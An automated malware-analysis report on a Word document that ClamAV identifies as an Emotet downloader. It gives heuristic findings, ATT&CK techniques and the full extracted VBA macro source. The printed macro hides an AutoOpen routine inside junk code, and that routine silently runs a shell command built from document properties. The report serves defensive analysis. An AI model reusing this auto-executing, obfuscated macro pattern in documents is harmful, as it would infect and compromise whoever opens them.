MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating a known downloader variant. Heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes the Shell() function, which is a strong indicator of malicious intent. The reference to PowerShell suggests the macro is likely used to download and execute a secondary payload, a common tactic for Emotet.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
On Error Resume Next VBA.Shell$ "" + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.CustomDocumentProperties("dLTfAuubRMz") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.BuiltInDocumentProperties("Comments") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + HRNbDGxU, 0 End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() vKDamGK -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6590 bytes |
SHA-256: e647fdaaff009e956bc933453a13e6a8c16232ca567e96b584201b9cc4cb6076 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub WYA(ycbrFt61j)
On Error Resume Next
For GWmi6C7 = 150 To 8942
If IDsU0SVcf Eqv LFzv29 Then
umQq = 793
End If
While zUsmU80YL Eqv 336179701
Mjuv0 = 36305085 + Sin(spkRYaL) / xauCjva + aVXmU31u5
Wend
PFkm7X6 = Ris
Select Case iyXC397Jx
Case 523
gMmE8TJ7y = Sqr(anFU7)
gna = ivDz5mQ0
swsCxJ = jQOz
Case 34
alH = Tan(9 * CByte(MnLzS) - AImz6 + Round(165366814))
qSMm2D5x9 = gIp
DvJoP0 = CStr(58 - CLng(xFcs47) / kFoAl / Fix(cHDS))
Case 1
sKzp374y = CDbl(86)
XgiO = MZe
ZgcVl = qUof8
End Select
For Each ITMc In TSvSs0j5
qvJdp = (hYflU26 - 393173989 / 43 * CDbl(eieZ) + 7 / Chr(wZns3x5q + Hex(fqGqkM4R) - 875 - ChrB(xUivv)))
Next
For WjZCw8 = cMFv8e193 To 4168
PDZZ30b1 = (970 + Tan(497) + 7 / Oct(2) + 9 - hmbkodI + Aldb / Tan(uXs / Round(404 - CBool(499 - ChrB(753))) * 950 * PhzfHI5rH))
Next
Next
Select Case GFctB2D
Case 64
IrYg = Tan(46)
DoGUi58f = CSng(exPr2g + CLng(42))
SLsaU = CStr(TXCq37ee4)
Case 452269913
Pfdpt25t = dfGR94
mvZco = 3815
LVsqE18 = 170
Case 6093
CRn = XZJpX
qZraT9RF = Chr(8 * Int(BrkL3O93R))
kcWl92n4 = ChrW(351 * IxZi)
End Select
End Sub
Sub EwEB8(LVhI5QiW)
On Error Resume Next
ZQO = 163195590 * aSNN94f94
RhLj2 = 523434313 / CLng(nyF * CSng(spiJ77)) + 9 / Rnd(90) - (WAv / oLsB73 - icsd5P * Sin(12 - jWsXj0 + jolN78n97 * Tan(7768)))
End Sub
Sub autoopen()
vKDamGK
End Sub
Sub Rlpz(TyRZ4)
On Error Resume Next
Do While nkcg10 = PQYLqo
WkNS4 = (bDCmN0 - Rnd(qyOjJ) * lMjcXCp * CLng(50)) + (506 + Fix(gngw4ur - CDbl(hCpY8Zl22) * 943 * CStr(myD)) * WqSc2E33r * CByte(5))
Do While dnRd9 <> ONkO
glSDC = 982 + Sqr(708 + Tan(6015) * xLlk6s / CSng(82)) * 7404 / CByte(2856 + CStr(cNYA58N)) * cJMR / ChrW(5221) + MRgUf12 / Wul + EyAj14653 - Tayy7x5 + Eazlp - Cos(213) + 87 * ChrB(148531398 / Fix(mHBNg83) + 191 - Oct(OqFx90))
Loop
Do
gNtu31Ws1 = Chr(21)
Loop Until WAqp8M <= gUhae5a61
Set Oct = 97
Loop
Select Case FToZ3Q
Case 3
EVFA = Rnd(HUcu33o3 - Hex(176937495))
GyIv3 = zpWx39p
Case 9
BAj = Sin(1065)
ibal4d = Int(YPnLHgJ - 23)
End Select
End Sub
Sub mHly92()
On Error Resume Next
Do
Select Case OvmXe2940
Case 319
AMNZW2 = mpE
jVAJ = Int(UgZs)
Case 7379
qTzh = 1265
KIOeoQ97 = uPrq4DIo
End Select
If Sfyu Or 7 Then
rwybHKx9 = 1
End If
Select Case UXTw67f
Case 329477815
OaxZ88 = Sqr(omNRm3g)
nfrN = Chr(500429753 + ChrW(DQjO))
KSpPa4 = GLAkPIZh
Case 55
AeWOPe34 = 524604147
MAa = ChrB(WSulMC48)
iALG = 9024
Case 984
Hen = Sqr(3)
Hpns = YEtMum
aOy = Sgn(hjPQOI)
End Select
If Ezvr1 < EqnZGX Then
RkcK2Q = Fix(476 + Fix(3372) + 384 / CDate(Snr))
End If
For Each JTwzu7h8T In bquD9acX6
irJc88jE = (470 / Cos(1582) - 1 - ChrW(NlaARB82) - pyobi * Fix(NVA) / (SKNW3 / Sgn(416368643) / YACdn6pH * 5))
Next
Loop Until CACYp3302 = Hsv
For Each cQvd In xeMy3Eg0
Do While smCz Eqv baP
JDBc43G33 = 394855255 + hJjBx * 7 - Chr(327)
Loop
Do
XrpgAuR5 = sUpI9063 / Sin(52 * CStr(2158 / CByte(905)) * vNXO + Sgn(5123 - 8)) + (862 * qXiL + XbkQ71 - CLng(156 * Fix(311872670 / EjMQ - 9900 / oPex65)) / 466235086 + Cos(7091 / Chr(EKt) * 9 / CDbl(173)))
Loop Until JLJB7 <> vBJt1cyr2
Do While vTpEW50q Or BHV
NFwA5 = kmJ - CLng(182027059) + TWXk0 * 48 - (1172 + 6861 - 8313 * Atn(dQdD4c768))
Loop
Next
dQKi = rGzY + 215849758
End Sub
Public Function vKDamGK()
On Error Resume Next
VBA.Shell$ "" + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.CustomDocumentProperties("dLTfAuubRMz") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + ActiveDocument.BuiltInDocumentProperties("Comments") + NmGBBcdB + yLtrXfTaKx + SEgSPEhg + UNaAyScMecn + eppxMzaDab + UrpSRhTe + VhxwsxkbGuc + cdCkBvhV + HRNbDGxU, 0
End Function
Sub MyFA(LWRTzy4)
On Error Resume Next
Do
YVKo7G546 = Round(5861)
Do
TgPcYS293 = 2268 - Chr(1 / mqBN68xfL * AeBmB65 / CBool(69 - Sqr(333111979 + aBwQ28 * mUjkg086V + Sin(owcssNi0)) - LNCI58j3 * Chr(504492035 * Hex(257 * Int(28 / Log(2 * QtXp) + 1 * CByte(446152698))) * 6801 - CDate(826)))) * 91 * Rnd(tiakY2 * CStr(JmnH)) + (Nhhd7 * 84 * (9 / 49))
Loop Until zgYT7bK = mvMjM
Select Case SccUGi036
Case 167
phob3o3O = 2
epI = doKW7Y01
Case 318244424
dSEI6T8G = CInt(NwFP)
rnAL629p = Tan(104656488)
Case 3139
zyhN = Fix(UxBfqZo)
sIjr4 = 58
End Select
HXJj = zSwTY
Loop Until GwaXy53L0 Or cbHV03FD
If RZwXk784e And 19 Then
For MLm = 93 To mAMx1B62
LKRB = 4959 - 2120 * 80 / Round(4948) - (487 + Hex(PJXZ0H) - alJ * CByte(69 * 92) - (TNlw0 + KhR))
Next
OzsVF = 166466868 - 410642679
End If
PBrr99V = (5946 * Rnd(nBF + 372 / NSMp - Tan(ZuKQ24 - 83)) + 504637565 + Atn(210)) / NVs / Log(oMs) - nPQo6nNB7 / CBool(rHzxE) - lPuB2x8 * Fix(jqJU290 - Atn(450609395))
End Sub
Sub VfM(KoWfNcC)
On Error Resume Next
rAdT59 = FxCL + CStr(440 * LiMJc7f1) * 14 - Round(bXUjCB61)
Select Case bvYi4
Case 5
xoma41J = ChrB(RtJjqlPN - Sin(hvCjd7y * 824 - WnnW45p - CStr(5416)))
WRs = CInt(444 - Oct(LkBXfLlBi * CDbl(9569)) - 8 * CBool(2804 - Sqr(113)))
Case 58
HBLGjz = CLng(298)
fDyEYx = CLng(343497477)
Case 514923700
BPeK73H = 3
RyECD8 = 66
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.